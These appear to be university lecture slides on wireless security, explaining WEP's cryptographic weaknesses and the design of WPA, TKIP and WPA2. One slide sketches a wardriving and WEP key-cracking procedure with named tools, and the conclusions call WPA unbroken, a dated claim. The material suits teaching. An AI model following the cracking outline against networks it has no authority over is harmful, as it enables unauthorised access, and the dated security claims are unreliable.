slide 1

SCSC 555

Hacking Wireless Networks(Part II – WEP & WPA)

slide 2

802.11b Overview

Standard for wireless networks• Approved by IEEE in 1999

Two modes: infrastructure and ad hoc

IBSS (ad hoc) mode BSS (infrastructure) mode

slide 3

Access Point SSID

Service Set Identifier (SSID) differentiates one access point from another• By default, access point broadcasts its SSID in

plaintext “beacon frames” every few seconds

Default SSIDs are easily guessable• Linksys defaults to “linksys”, Cisco to “tsunami”, etc.• This gives away the fact that access point is active

Access point settings can be changed to prevent it from announcing its presence in beacon frames and from using an easily guessable SSID• But then every user must know SSID in advance

slide 4

Wired Equivalent Privacy (WEP)

Special-purpose protocol for 802.11b• Intended to make wireless as secure as wired

network

Goals: confidentiality, integrity, authentication

Assumes that a secret key is shared between access point and clients

Uses RC4 stream cipher seeded with 24-bit initialization vector and 40-bit key• Terrible design choice for wireless environment• RC4 is used properly in SSL

slide 5

Shared-Key Authentication

beacon

Prior to communicating data, access point may require client to authenticate

Access Point Client

association requestassociation response

probe requestOR

challenge

challengeRC4(IV,K)

unauthenticated &unassociated

authenticated &unassociated

authenticated &associated

Passive eavesdropper recovers RC4(IV,K), can respond to any challenge from then on without knowing K

slide 6

How WEP Works

24 bits 40 bits

IV | shared key used as RC4 seed• Must never be repeated (why?)• There is no key update protocol in 802.11b, so security relies on never repeating IV

IV sent in the clearWorse: 802.11b says that changing IV with each packet is optional!

CRC-32 checksum is linear in : if attacker flips some bit in plaintext, there is a known, plaintext-independent set of CRC bits that, if flipped, will produce the same checksum

no integrity!

slide 7

Why RC4 is a Bad Choice for WEP

Stream ciphers require synchronization of key streams on both ends of connection• This is not suitable when packet losses are common

WEP solution: a separate seed for each packet• Can decrypt a packet even if a previous packet was

lost

But number of possible seeds is not large enough!• RC4 seed = 24-bit initialization vector + fixed key• Assuming 1500-byte packets at 11 Mbps, 224 possible IVs will be exhausted in about 5 hours

Seed reuse is deadly for stream ciphers

slide 8

Recovering Keystream

Get access point to encrypt a known plaintext• Send spam, access point will encrypt and forward it• Get victim to send an email with known content

If attacker knows plaintext, it is easy to recover keystream from ciphertext• C M = (MRC4(IV,key)) M = RC4(IV,key)• Not a problem if this keystream is not re-used

Even if attacker doesn’t know plaintext, he can exploit regularities (plaintexts are not random)• For example, IP packet structure is very regular

slide 9

Keystream Will Be Re-Used

In WEP, repeated IV means repeated keystream Busy network will repeat IVs often

• Many cards reset IV to 0 when re-booted, then increment by 1 expect re-use of low-value IVs

• If IVs are chosen randomly, expect repetition in O(212) due to birthday paradox (similar to hash collisions)

Recover keystream for each IV, store in a table• (KnownM RC4(IV,key)) KnownM = RC4(IV,key)

• Even if don’t know M, can exploit regularities

Wait for IV to repeat, decrypt and enjoy plaintext• (M’ RC4(IV,key)) RC4(IV,key) = M’

slide 10

It Gets Worse

Misuse of RC4 in WEP is a design flaw with no fix• Longer keys do not help!

– The problem is re-use of IVs, their size is fixed (24 bits)

• Attacks are passive and very difficult to detect

Perfect target for Fluhrer et al. attack on RC4• Attack requires known IVs of a special form• WEP sends IVs in plaintext• Generating IVs as counters or random numbers will

produce enough “special” IVs in a matter of hours

This results in key recovery (not just keystream)• Can decrypt even ciphertexts whose IV is unique

slide 11

Do Not Do This[Brian Lee]

Ingredients: Laptop (with 802.11b card, GPS, Netstumbler, Airsnort,

Ethereal) and the car of your choice Drive around, use Netstumbler to map out active

wireless networks and (using GPS) their access points If network is encrypted, park the car, start Airsnort,

leave it be for a few hours• Airsnort will passively listen to encrypted network traffic

and, after 5-10 million packets, extract the encryption key Once the encryption key is compromised, connect to the

network as if there is no encryption at all Alternative: use Ethereal (or packet sniffer of your

choice) to listen to decrypted traffic and analyze Many networks are even less secure

slide 12

Weak Countermeasures

Run VPN on top of wireless• Treat wireless as you would an insecure wired network• VPNs have their own security and performance issues

– Compromise of one client may compromise entire network

Hide SSID of your access point• Still, raw packets will reveal SSID (it is not encrypted!)

Have each access point maintain a list of network cards addresses that are allowed to connect to it• Infeasible for large networks• Attacker can sniff a packet from a legitimate card, then re-

code (spoof) his card to use a legitimate address

slide 13

Fixing the Problem

Extensible Authentication Protocol (EAP)• Developers can choose their own authentication method

– Cisco EAP-LEAP (passwords), Microsoft EAP-TLS (public-key certificates), PEAP (passwords OR certificates), etc.

802.11i standard fixes 802.11b problems• Patch: TKIP. Still RC4, but encrypts IVs and establishes

new shared keys for every 10 KBytes transmitted– No keystream re-use, prevents exploitation of RC4 weaknesses– Use same network card, only upgrade firmware

• Long-term: AES in CCMP mode, 128-bit keys, 48-bit IVs– Block cipher (in special mode) instead of stream cipher– Requires new network card hardware

slide 14

Hacking Wireless Networks(Part III – WPA)

slide 15

What is WPA?

WPA (Wireless Protected Access) or WEP2 ■ An interim solution to replace WEP.

■ Aimed to work well with hardware designed for WEP.

■ Still use RC4 for encryption.

■ Several new elements were introduced: - TKIP (Temporal Key Integrity Protocol). - MIC (message integrity code) for preventing forgery. - IV=48 bits for preventing replay attack. - A mixing function for generating per-frame key.

15

slide 16

WPA Structure

16

802.11 Hdr data

802.11 Hdr IV Data MIC

RC4 Encryption

MIC Function

MIC||

K

WEP Key Per-Frame Key

Integrity Key

TKIP

Mixing Function K’

slide 17

WPA Structure (in details)

slide 18

WPA - Modes of OperationWPA - Modes of Operation

Enterprise Mode:

- Requires an authentication server – RADIUS(Remote Authentication Dial In Service) for authentication and key distribution- RADIUS has centralized management of user credentials

Pre-shared key (PSK) Mode:

- Does not require authentication server- A “shared secret” is used for authentication to access point vulnerable to dictionary attacks

18

slide 19

Enterprise Mode DiagramEnterprise Mode Diagram

19

slide 20

PSK Mode Diagram PSK Mode Diagram

20

slide 21

Issues of PSK ModeIssues of PSK Mode

Needed if no authentication server is in use

“shared secret” – revealed, network security is compromised

No standardized way of changing shared secret

It increases the attacker’s effort to do decryption of messages

The more complex the shared secret is, the better it is

as there are less chances of dictionary attacks

21

slide 22

Summary: Security Mechanisms in WPASummary: Security Mechanisms in WPA

22

slide 23

802.1X Authentication prevents end users from 802.1X Authentication prevents end users from accessing Enterprise networksaccessing Enterprise networks

23

slide 24

TKIP – Temporal Key Integrity ProtocolTKIP – Temporal Key Integrity Protocol TKIP is responsible for generating the encryption key, encrypting the message and verifying its integrity

TKIP ensures: - Encryption key changes with every packet - Encryption key is unique for every client - TKIP encryptions keys are 256 bit long

WEP Encryption key = shared secret + IV

TKIP packet comprises of: - 128 bit temporal key (shared by both clients and AP) - Client Device MAC address - 48 bit IV (Packet sequence number) to prevent known plain text attacks (WEP = 24 bit IV)

24

slide 25

TKIP for Data PrivacyTKIP for Data Privacy

TKIP key mixing function + temporal key = per packet key

Temporal keys - 128 bit, change frequently, definite life

MAC Address + Temporal key + four most significant octets of the packet sequence number are fed into the S-Box to generate intermediate key

Results in a unique encryption key

Then, mix the intermediate key with two least significant octets of packet sequence number = 128 bit per packet key

Each key encrypts only one packet of data and prevents weak key attacks

25

slide 26

Message Integrity Check (MIC)Message Integrity Check (MIC)

Used to enforce data integrity

“Message Integrity Code” (MIC) = 64 bit message calc. using Michael’s algorithm

MIC is inserted in the TKIP packet

The sender and the receiver each compute MIC and then compare. MIC does not match = data is manipulated

Detects potential packet content altercation due to transmission error or purposeful manipulation

Uses 64 bit key and partitions the data into 32 bit blocks

Various operations: shifts, XOR’s, additions

26

slide 27

WPA2 WPA2

A long term solution specified by IEEE 802.11iUse AES (in a new mode called CCM) for encryption.

Counter Mode with CBC-MAC Protocol (CCMP) encryption

CCMP = CTR + CBC + MAC

■ Several new elements were introduced: - The base key K=128 bits. - MIC is 64 bits for preventing forgery. - IV=48 bits for preventing replay attack. - Packet sequence number is used to generate IV. Will require or replacement hardware (AP’s and NIC’s)

27

slide 28

WPA2WPA2

28

802.11 Hdr 802.11i Hdr Data MIC FCS

Encrypted by AES

Authenticated by MIC

IV Key ID

slide 29

Encryption Method Comparison TableEncryption Method Comparison Table

WEP WPA WPA2

Cipher RC4 RC4 AES

Key Size 40 bits128 bits encryption 64

bits authentication128 bits

Key Life 24 bit IV 48 bit IV 48 bit IV

Packet Key Concatenated Mixing Function Not needed

Data Integrity CRC-32 Michael Algorithm CCM

Header Integrity None Michael Algorithm CCM

Replay Attack None IV Sequence IV Sequence

Key Management None EAP Based EAP Based

29

slide 30

ConclusionsConclusions

WEP is not secure anymore !

WPA solves almost all WEP weaknesses

WPA still considered secure and provides secure authentication, encryption and access control

WPA is not yet broken…!

WPA2 is a stronger cipher than WPA and will provide robust security for WLANs

30